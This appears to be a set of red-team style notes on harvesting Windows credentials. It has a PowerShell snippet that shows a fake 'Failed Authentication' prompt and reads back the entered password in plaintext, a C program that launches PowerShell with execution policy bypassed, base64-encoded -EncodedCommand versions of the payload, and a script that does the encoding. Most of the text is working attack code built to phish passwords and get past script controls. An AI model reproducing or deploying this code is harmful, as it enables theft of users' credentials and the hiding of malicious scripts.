$cred = $host.ui.PromptForCredential('Failed Authentication','', [Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);

$name = $cred.username;

$password = $cred.getnetworkcredential().password;

## Simple C

#include <stdio.h>
int main() {
  system("powershell -executionpolicy bypass ./foo.ps1");
  return 0;
 }

## Encode foo.ps1 in base64 
$wshell = New-Object -ComObject Wscript.Shell
$wshell.Popup("Operation Completed",0,"Done",0x1)  
  
  
# PowerShell -EncodedCommand LKAJDSLKSAJDLKJSADLKASJDLKAJSDLKAJSDLAJSDLK=  
system("powershell -executionpolicy bypass -EncodedCommand JGNyZWQgPSAkaG9zdC51aS5Qcm9tcHRGb3JDcmVkZW50aWFsKCdGYWlsZWQgQXV0aGVudGljYXRpb24nLCcnLCBbRW52aXJvbm1lbnRdOjpVc2VyRG9tYWluTmFtZSArICJcIiArIFtFbnZpcm9ubWVudF06OlVzZXJOYW1lLFtFbnZpcm9ubWVudF06OlVzZXJEb21haW5OYW1lKTsNCg0KJG5hbWUgPSAkY3JlZC51c2VybmFtZTsNCg0KJHBhc3N3b3JkID0gJGNyZWQuZ2V0bmV0d29ya2NyZWRlbnRpYWwoKS5wYXNzd29yZA== ");

powershell -executionpolicy bypass -EncodedCommand VAByAHkAIAB7ACAAJABjAHIAZQBkACAAPQAgACQAaABvAHMAdAAuAHUAaQAuAFAAcgBvAG0AcAB0AEYAbwByAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAAnAEYAYQBpAGwAZQBkACAAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuACcALAAnACcALAAgAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFUAcwBlAHIARABvAG0AYQBpAG4ATgBhAG0AZQAgACsAIAAiAFwAIgAgACsAIABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBVAHMAZQByAE4AYQBtAGUALABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBVAHMAZQByAEQAbwBtAGEAaQBuAE4AYQBtAGUAKQA7ACAAJABuAGEAbQBlACAAPQAgACQAYwByAGUAZAAuAHUAcwBlAHIAbgBhAG0AZQA7ACAAIAAkAHAAYQBzAHMAdwBvAHIAZAAgAD0AIAAkAGMAcgBlAGQALgBnAGUAdABuAGUAdAB3AG8AcgBrAGMAcgBlAGQAZQBuAHQAaQBhAGwAKAApAC4AcABhAHMAcwB3AG8AcgBkADsAIAB9ACAAQwBhAHQAYwBoACAAWwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AUgB1AG4AdABpAG0AZQBFAHgAYwBlAHAAdABpAG8AbgBdACAAewAgACQAbgBhAG0AZQAgAD0AIABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBVAHMAZQByAE4AYQBtAGUAOwAgACQAcABhAHMAcwB3AG8AcgBkACAAPQAgACIAIgAgAH0AIAAgACQAdwBzAGgAZQBsAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABXAHMAYwByAGkAcAB0AC4AUwBoAGUAbABsADsAIAAkAHcAcwBoAGUAbABsAC4AUABvAHAAdQBwACgAIgBUAGgAYQBuAGsAcwAsACAAIgAgACsAIAAkAG4AYQBtAGUAIAArACAAIgAgADoAOgAgACIAIAArACAAJABwAGEAcwBzAHcAbwByAGQALAAwACwAIgBEAG8AbgBlACIAKQAgADsAIAAgACMAIABpAG4AdABCAHUAdAB0AG8AbgAgAD0AIABvAGIAagBlAGMAdAAuAFAAbwBwAHUAcAAoAHMAdAByAFQAZQB4AHQALABbAG4AUwBlAGMAbwBuAGQAcwBUAG8AVwBhAGkAdABdACwAWwBzAHQAcgBUAGkAdABsAGUAXQAsAFsAbgBUAHkAcABlAF0AKQAgAA==
A==

# Base64 Encoder
$sc = Get-Content ???.\foo.ps1???
$bytes = [System.Text.Encoding]::Unicode.GetBytes($sc)
$enco = [Convert]::ToBase64String($bytes)
$enco| out-file "msg.b64"
